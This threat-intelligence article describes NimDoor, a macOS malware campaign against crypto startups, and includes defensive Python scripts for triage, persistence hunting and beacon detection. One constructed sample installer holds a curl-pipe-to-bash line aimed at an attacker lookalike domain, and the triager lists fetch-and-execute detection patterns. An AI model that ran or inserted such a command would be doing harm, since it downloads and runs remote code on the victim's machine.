North Korean threat actors are running a cyber-espionage campaign against Web3 and cryptocurrency startups using a newly identified macOS malware family that SentinelLabs tracks as NimDoor. According to SentinelLabs, the operators pair unusual tooling (binaries compiled from Nim, a language still rarely seen in macOS malware) with social engineering to get onto victims' machines and steal credentials and data.
Fake Zoom Meeting Updates Used as Lure
The intrusion starts with a contact on Telegram who impersonates someone the target trusts and asks to schedule a meeting through Calendly. The target then receives an email styled as a Zoom update notice that carries a spoofed meeting link. The link leads to a download from a lookalike domain such as support.us05web-zoom.forum or support.us05web-zoom.cloud. These imitate Zoom's real us05web.zoom.us host by turning a dot into a hyphen and swapping the top-level domain; the quick check is that genuine Zoom hosts end in zoom.us.
The installer, presented under a name with a subtle typo such as "Zook SDK Update" instead of "Zoom SDK Update", is a script padded with tens of thousands of blank lines. Buried in that padding are just a few lines that do the real work: they download further payloads from attacker-controlled servers and execute them. The padding pushes those lines past what a casual reader, or a tool that only previews the start of a file, will ever see.
Once run, the script opens a genuine Zoom redirect page alongside a decoy HTML file so the victim sees what looks like a normal update, while the infection proceeds in the background.
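A first-pass triage of an installer like the one described above needs only two measurements: how much of the file is whitespace, and which non-blank lines fetch and run something. The script below is an added example (not code from SentinelLabs or from the article); the regular expressions are generic fetch-and-execute patterns rather than NimDoor signatures, the 95%/1000-line padding threshold is an arbitrary choice, and the sample installer is constructed here, with only the domain taken from the report (the "/update" path is invented).

```python
"""Triage a suspected padded installer script: how much of it is whitespace, and which
lines actually do something. Added example; not code from SentinelLabs or the article."""
import re

# Fetch-and-execute constructs worth flagging in any "updater" script. Generic patterns,
# not NimDoor-specific signatures.
SUSPICIOUS = [
    re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba|z)?sh\b"),  # curl ... | bash
    re.compile(r"\bdo shell script\b"),                     # AppleScript -> shell escape
    re.compile(r"\bbase64\s+(-d|-D|--decode)\b"),           # decode-then-run staging
    re.compile(r"\bchmod\s+\+?x\b"),                        # mark a dropped payload executable
    re.compile(r"\bopen\s+https?://"),                      # decoy page launch
]

# Any host containing "zoom" that is not under zoom.us is a lookalike.
ZOOMISH_HOST = re.compile(r"https?://([a-z0-9.-]*zoom[a-z0-9.-]*)", re.I)


def triage_script(text: str) -> dict:
    lines = text.splitlines()
    blank = sum(1 for line in lines if not line.strip())
    hits = [(n, line.strip()) for n, line in enumerate(lines, 1)
            if line.strip() and any(p.search(line) for p in SUSPICIOUS)]
    hosts = {m.group(1).lower() for m in ZOOMISH_HOST.finditer(text)}
    lookalikes = sorted(h for h in hosts if h != "zoom.us" and not h.endswith(".zoom.us"))
    ratio = blank / len(lines) if lines else 0.0
    return {
        "total_lines": len(lines),
        "blank_lines": blank,
        "blank_ratio": round(ratio, 4),
        # A script that is >95% blank and thousands of lines long is padded, not formatted.
        "padded": len(lines) > 1000 and ratio > 0.95,
        "suspicious": hits,            # (line number, stripped line)
        "lookalike_hosts": lookalikes,
    }


# Constructed sample installer: a decoy open of the real Zoom site, 20,000 blank lines,
# then the one line that matters. The "/update" path is invented for this example;
# only the domain comes from the report.
SAMPLE = (
    "open https://zoom.us/\n"
    + "\n" * 20000
    + 'do shell script "curl -s https://support.us05web-zoom.forum/update | bash"\n'
)

if __name__ == "__main__":
    report = triage_script(SAMPLE)
    print(f"{report['blank_lines']}/{report['total_lines']} lines blank, padded={report['padded']}")
    for n, line in report["suspicious"]:
        print(f"line {n}: {line}")
    print("lookalike hosts:", report["lookalike_hosts"])
```

Run it against a real sample by passing the file contents to triage_script; the line numbers in the output tell you exactly where to look in an otherwise empty file. The lookalike check is deliberately strict: a host that merely contains "zoom" but is not under zoom.us is treated as suspect, which is the right default when the lure is a Zoom update.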
NimDoor Malware Capabilities
NimDoor operates through two main functions once it infects a Mac:
1. Data theft: it harvests saved passwords, browsing history, and login credentials from browsers including Chrome, Firefox, Edge, Brave, and Arc, and also reads the user's keychain databases and shell command history files.
2. Telegram targeting: a dedicated component copies Telegram's encrypted local chat database together with the key needed to decrypt it, so the attackers can read private messages offline.
Stolen data is staged in hidden directories whose names imitate legitimate system files, then exfiltrated over encrypted connections to attacker-controlled servers.
Advanced Stealth and Persistence
NimDoor's components are written in Nim and C++. Nim in particular is still rare in macOS malware, which leaves signature-based antivirus with few existing detections to match and gives analysts less familiar compiled code to work through; the language is not an evasion technique in itself, its novelty is. The malware talks to its command-and-control servers over encrypted channels and relies on deceptive file names and locations to stay unnoticed.
Persistence is a key focus. The malware watches for attempts to terminate or remove it and reinstalls itself from hidden backup copies, names its files with slightly misspelled system-like names, and registers itself to launch automatically at startup. Removal therefore has to take out the launch entry, the running process and the backup copies together, or the malware simply restores itself.
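The two places a hunt for this behaviour looks first are launch entries whose labels are near-misses of legitimate ones and hidden directories whose names are near-misses of real system files (the staging folders mentioned earlier and the misspelled persistence names above). The code below is an added example, not SentinelLabs' or the article's: the "known good" name lists are short illustrative stand-ins for a real allowlist, the homoglyph table and edit-distance threshold are arbitrary choices, and the LaunchAgent plists and hidden-directory names are constructed here rather than taken from the report. On a real host you would feed it the parsed contents of ~/Library/LaunchAgents and /Library/LaunchAgents and a listing of dot-directories under the home folder.

```python
"""Hunt for lookalike names in LaunchAgent plists and hidden directories.
Added example; not code from SentinelLabs or the article."""
import plistlib

# Illustrative allowlists. A real hunt loads Apple's labels plus the host's known-good set.
KNOWN_LABELS = ["com.apple.softwareupdate", "com.google.keystone.agent", "com.zoom.us"]
KNOWN_DIRS = [".Trash", ".DS_Store", ".config", ".cache", ".CFUserTextEncoding"]

# Fold the classic look-alike characters before comparing, so "GoogIe" reads as "google".
HOMOGLYPHS = str.maketrans({"I": "l", "1": "l", "0": "o", "|": "l"})


def canon(name: str) -> str:
    return name.translate(HOMOGLYPHS).lower()


def edit_distance(a: str, b: str) -> int:
    """Plain Levenshtein distance; short names make the O(len(a)*len(b)) cost irrelevant."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(name: str, known: list[str], max_dist: int = 2):
    """Return the legitimate name `name` imitates, or None. An exact match is legitimate;
    anything else within max_dist edits after homoglyph folding is a lookalike."""
    if name in known:
        return None
    for k in known:
        if edit_distance(canon(name), canon(k)) <= max_dist:
            return k
    return None


def suspicious_launch_agents(plists: dict[str, bytes]) -> list[dict]:
    """plists maps plist path -> raw plist bytes. Flags lookalike labels and programs that
    live in hidden directories; notes RunAtLoad+KeepAlive, which relaunches a killed process."""
    findings = []
    for path, raw in plists.items():
        p = plistlib.loads(raw)
        label = p.get("Label", "")
        args = p.get("ProgramArguments") or [p.get("Program", "")]
        program = args[0] if args else ""
        reasons = []
        twin = lookalike_of(label, KNOWN_LABELS)
        if twin:
            reasons.append(f"label imitates {twin}")
        if any(part.startswith(".") for part in program.split("/")[1:]):
            reasons.append("program lives in a hidden directory")
        if reasons:
            if p.get("RunAtLoad") and p.get("KeepAlive"):
                reasons.append("RunAtLoad+KeepAlive: launchd restarts it if killed")
            findings.append({"path": path, "label": label, "program": program, "reasons": reasons})
    return findings


def suspicious_hidden_dirs(names: list[str]) -> list[tuple[str, str]]:
    """(hidden directory name, legitimate name it imitates) for every near-miss."""
    return [(n, twin) for n in names if n.startswith(".")
            for twin in [lookalike_of(n, KNOWN_DIRS)] if twin]


# Constructed samples: one agent with a capital-I-for-l label pointing into a hidden
# directory, one ordinary agent, and a home folder listing with two misspelled dot-dirs.
SAMPLE_PLISTS = {
    "~/Library/LaunchAgents/com.appIe.softwareupdate.plist": plistlib.dumps({
        "Label": "com.appIe.softwareupdate",
        "ProgramArguments": ["/Users/me/Library/.update/softwareupdate"],
        "RunAtLoad": True, "KeepAlive": True,
    }),
    "~/Library/LaunchAgents/com.zoom.us.plist": plistlib.dumps({
        "Label": "com.zoom.us",
        "ProgramArguments": ["/Applications/zoom.us.app/Contents/MacOS/zoom.us"],
        "RunAtLoad": True,
    }),
}
SAMPLE_HIDDEN = [".Trash", ".DS_Store", ".Trasch", ".cacche", ".config"]

if __name__ == "__main__":
    for f in suspicious_launch_agents(SAMPLE_PLISTS):
        print(f"{f['path']}: {f['label']} -> {f['program']}: {'; '.join(f['reasons'])}")
    for name, twin in suspicious_hidden_dirs(SAMPLE_HIDDEN):
        print(f"hidden dir {name} imitates {twin}")
    print("installer name distance:", edit_distance("Zook SDK Update", "Zoom SDK Update"))
```

The same edit_distance check explains why "Zook SDK Update" slips past a reader: it is one substitution away from the real name. The useful property of the combined check is that a lookalike label and a program in a hidden directory are each individually weak signals but together identify exactly the persistence pattern described above.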
A lightweight component checks in with the attackers' servers every 30 seconds to report status and fetch new commands, shaping the traffic to look like ordinary web requests. A built-in delay of about 10 minutes before full activation targets sandboxes and scanners that observe a sample for only a few minutes: nothing malicious happens inside that window.
Together these techniques make NimDoor very hard for an ordinary user to detect or remove without expert help. The scale and complexity of the campaign, including phishing domains tailored per target, point to a broader, ongoing operation against multiple victims.
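Because the check-ins are shaped to look like normal web traffic, content inspection has little to work with; the timing does. A fixed 30-second cadence shows up as near-zero variance in the gaps between connections from one process to one host, and the 10-minute quiet period shows up as a long gap between process start and first outbound connection. The script below is an added example, not SentinelLabs' or the article's code: the record format, the pid/host/size fields, the thresholds (coefficient of variation 0.2, 2 KB per request, eight events minimum) and the log lines themselves are all constructed here, with the lookalike domain taken from the report.

```python
"""Spot fixed-interval beaconing and a delayed first contact in outbound connection
records. Added example; not code from SentinelLabs or the article."""
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import median, pstdev

# Constructed record format: "<ISO timestamp> <pid> <destination host> <bytes sent>".
# Real inputs would be EDR network events or proxy logs carrying the same fields.


def parse(lines):
    events = defaultdict(list)
    for line in lines:
        ts, pid, host, nbytes = line.split()
        events[(pid, host)].append((datetime.fromisoformat(ts), int(nbytes)))
    for evs in events.values():
        evs.sort()
    return events


def beacon_candidates(lines, min_events=8, max_cv=0.2, max_bytes=2048):
    """(pid, host) pairs whose inter-connection gaps are nearly constant and whose
    requests are small. Thresholds are illustrative; a beacon with deliberate jitter
    needs a looser max_cv."""
    out = []
    for (pid, host), evs in parse(lines).items():
        if len(evs) < min_events:
            continue
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(evs, evs[1:])]
        med = median(gaps)
        cv = pstdev(gaps) / med if med else float("inf")   # coefficient of variation
        if cv <= max_cv and all(n <= max_bytes for _, n in evs):
            out.append({"pid": pid, "host": host, "period_s": round(med, 1),
                        "cv": round(cv, 3), "count": len(evs)})
    return out


def first_contact_delay(lines, process_start):
    """Seconds from each process's start to its first outbound connection. A long quiet
    window before the first beacon is the sandbox-evasion delay described above."""
    first = {}
    for (pid, host), evs in parse(lines).items():
        t = evs[0][0]
        if pid in process_start and (pid not in first or t < first[pid]):
            first[pid] = t
    return {pid: (t - process_start[pid]).total_seconds() for pid, t in first.items()}


T0 = datetime(2025, 7, 1, 12, 0, 0)   # constructed process start time for both pids


def build_sample_log():
    lines = []
    # Implant (pid 4242): silent for 10 minutes, then ~30 s check-ins with sub-second
    # jitter, each a few hundred bytes.
    jitter = [0.0, 0.4, -0.3, 0.2, -0.1]
    for i in range(20):
        t = T0 + timedelta(seconds=600 + 30 * i + jitter[i % len(jitter)])
        lines.append(f"{t.isoformat()} 4242 support.us05web-zoom.cloud 310")
    # Browser (pid 100): irregular human-driven requests to the real Zoom site.
    gaps = [2, 45, 7, 120, 3, 60, 15, 200, 1]
    sizes = [51200, 900, 30000, 1200, 48000, 700, 25000, 64000, 800]
    t = T0 + timedelta(seconds=5)
    for gap, size in zip(gaps, sizes):
        lines.append(f"{t.isoformat()} 100 zoom.us {size}")
        t += timedelta(seconds=gap)
    lines.append(f"{t.isoformat()} 100 zoom.us 4096")
    return lines


SAMPLE_LOG = build_sample_log()

if __name__ == "__main__":
    for c in beacon_candidates(SAMPLE_LOG):
        print(f"beacon: pid {c['pid']} -> {c['host']} every {c['period_s']}s "
              f"(cv {c['cv']}, n={c['count']})")
    for pid, delay in first_contact_delay(SAMPLE_LOG, {"4242": T0, "100": T0}).items():
        print(f"pid {pid}: first outbound connection {delay:.0f}s after start")
```

The browser traffic in the sample is not flagged twice over: its gaps are wildly uneven and several of its requests are far larger than a beacon's. In production the period and variance thresholds should be tuned against a baseline of the host's legitimate keep-alive traffic (chat clients and update checkers also poll on a schedule), and process start times come from the same EDR feed that supplies the connection events.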